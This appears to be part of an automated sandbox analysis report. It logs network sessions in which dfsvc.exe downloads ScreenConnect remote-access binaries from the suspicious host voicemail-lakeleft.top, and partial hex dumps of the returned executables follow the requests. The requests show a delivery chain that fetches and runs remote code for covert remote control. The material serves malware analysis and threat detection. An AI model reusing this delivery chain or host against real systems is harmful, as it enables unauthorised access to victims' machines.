                                                                                                                                                                                                                                                  Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
                                                                                                                                                                                                                                                  2024-11-08 10:01:23 UTC16384INData Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00
                                                                                                                                                                                                                                                  Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
                                                                                                                                                                                                                                                  2024-11-08 10:01:23 UTC16384INData Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06
                                                                                                                                                                                                                                                  Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.549756194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:24 UTC130OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:24 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 68096
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:24 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:24 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
                                                                                                                                                                                                                                                  2024-11-08 10:01:24 UTC16384INData Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00
                                                                                                                                                                                                                                                  Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                  2024-11-08 10:01:25 UTC16384INData Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4
                                                                                                                                                                                                                                                  Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                  2024-11-08 10:01:25 UTC16384INData Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e
                                                                                                                                                                                                                                                  Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
                                                                                                                                                                                                                                                  2024-11-08 10:01:25 UTC2776INData Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.549767194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:25 UTC100OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 1721856
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:26 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16384INData Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35
                                                                                                                                                                                                                                                  Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16384INData Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f
                                                                                                                                                                                                                                                  Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16384INData Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56
                                                                                                                                                                                                                                                  Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16384INData Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd
                                                                                                                                                                                                                                                  Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                                                  2024-11-08 10:01:26 UTC16384INData Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69
                                                                                                                                                                                                                                                  Data Ascii: [4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                                                  2024-11-08 10:01:27 UTC16384INData Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f
                                                                                                                                                                                                                                                  Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
                                                                                                                                                                                                                                                  2024-11-08 10:01:27 UTC16384INData Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c
                                                                                                                                                                                                                                                  Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
                                                                                                                                                                                                                                                  2024-11-08 10:01:27 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                                                                                                                  Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                                                                                                                  2024-11-08 10:01:27 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                                                                                                                  Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.549802194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:31 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 601376
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:31 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
